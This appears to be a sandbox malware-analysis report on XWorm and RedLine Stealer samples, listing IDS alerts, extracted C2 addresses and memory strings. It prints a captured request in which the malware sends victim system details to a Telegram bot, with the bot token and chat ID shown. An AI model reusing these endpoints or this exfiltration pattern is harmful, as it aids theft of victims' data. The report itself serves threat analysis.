                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: oC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: |C:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: }C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: kC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: iC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: {C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb! source: spoolsv.exe, 00000000.00000002.3717823961.0000000004D4C000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004D4C000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: spoolsv.exe, 00000000.00000002.3717823961.0000000004324000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: spoolsv.exe, 00000000.00000002.3717823961.0000000002F24000.00000004.00000800.00020000.00000000.sdmp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB0815BEC4 FindFirstFileExA,8_2_00007FFB0815BEC4
                            Source: C:\Users\user\AppData\Local\Temp\attzwu.exeCode function: 27_2_73CFC027 FindFirstFileExA,27_2_73CFC027

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 78.70.235.238:7000 -> 192.168.2.7:49837
                            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49837 -> 78.70.235.238:7000
                            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49837 -> 78.70.235.238:7000
                            Source: Network trafficSuricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 78.70.235.238:7000 -> 192.168.2.7:49837
                            Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 78.70.235.238:7000 -> 192.168.2.7:49837
                            Source: Network trafficSuricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.7:49837 -> 78.70.235.238:7000
                            Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.7:49975 -> 78.70.235.238:1912
                            Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.7:49975 -> 78.70.235.238:1912
                            Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 78.70.235.238:1912 -> 192.168.2.7:49975
                            Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 78.70.235.238:1912 -> 192.168.2.7:49975
                            Source: Network trafficSuricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.7:49976 -> 78.70.235.238:7000
                            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49976 -> 78.70.235.238:7000
                            Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.7:49830 -> 149.154.167.220:443
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: 78.70.235.238
                            Source: Malware configuration extractorURLs: f8terat.ddns.net
                            Source: Malware configuration extractorURLs: 78.70.235.238:1912
                            Uses dynamic DNS services
                            Source: unknownDNS query: name: f8terat.ddns.net
                            Uses the Telegram API (likely for C&C communication)
                            Source: unknownDNS query: name: api.telegram.org
                            Yara detected Generic Downloader
                            Source: Yara matchFile source: spoolsv.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.spoolsv.exe.bc0000.0.unpack, type: UNPACKEDPE
                            Source: global trafficTCP traffic: 192.168.2.7:49837 -> 78.70.235.238:7000
                            Source: global trafficHTTP traffic detected: GET /bot7742194912:AAGSH51C4BpkbbvEQlO-cv-lDoJZMVxqyN4/sendMessage?chat_id=5456205643&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A1BE7C2BE68B9D4CE53EB%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20VPWLLKOO%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20HawkEye%20V1.0 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                            Source: Joe Sandbox ViewASN Name: TELIANET-SWEDENTeliaCompanySE TELIANET-SWEDENTeliaCompanySE
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownDNS query: name: ip-api.com
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficHTTP traffic detected: GET /bot7742194912:AAGSH51C4BpkbbvEQlO-cv-lDoJZMVxqyN4/sendMessage?chat_id=5456205643&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A1BE7C2BE68B9D4CE53EB%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20VPWLLKOO%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20HawkEye%20V1.0 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: spoolsv.exe, 00000000.00000002.3717823961.000000000603C000.00000004.00000800.00020000.00000000.sdmp, spoolsv.exe, 00000000.00000002.3717823961.0000000005E7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "www.facebook.com", equals www.facebook.com (Facebook)
                            Source: global trafficDNS traffic detected: DNS query: ip-api.com
                            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                            Source: global trafficDNS traffic detected: DNS query: f8terat.ddns.net
                            Source: powershell.exe, 0000000E.00000002.1652437445.00000292EEA05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                            Source: powershell.exe, 0000000E.00000002.1661239977.00000292F09F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m-=
                            Source: powershell.exe, 00000008.00000002.1405199597.000002AE9F71E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1857257953.00000237328A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                            Source: powershell.exe, 00000008.00000002.1405199597.000002AE9F71E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1857257953.00000237328A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                            Source: powershell.exe, 0000000E.00000002.1652437445.00000292EEA05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                            Source: spoolsv.exeString found in binary or memory: http://ip-api.com/line/?fields=hosting
                            Source: spoolsv.exe, 00000000.00000002.4039746911.00000000133E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1395489278.000002AE97135000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1487580375.0000027A10073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1630052874.0000029290071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1828790892.000002372A1B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                            Source: powershell.exe, 00000010.00000002.1702338670.000002371A369000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                            Source: spoolsv.exe, 00000000.00000002.3717823961.0000000004D4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1379374905.000002AE872E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1434088094.0000027A00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1541348744.0000029280229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1702338670.000002371A369000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                            Source: attzwu.exe, 0000001B.00000002.2713604809.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                            Source: attzwu.exe, 0000001B.00000002.2713604809.000000000331A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
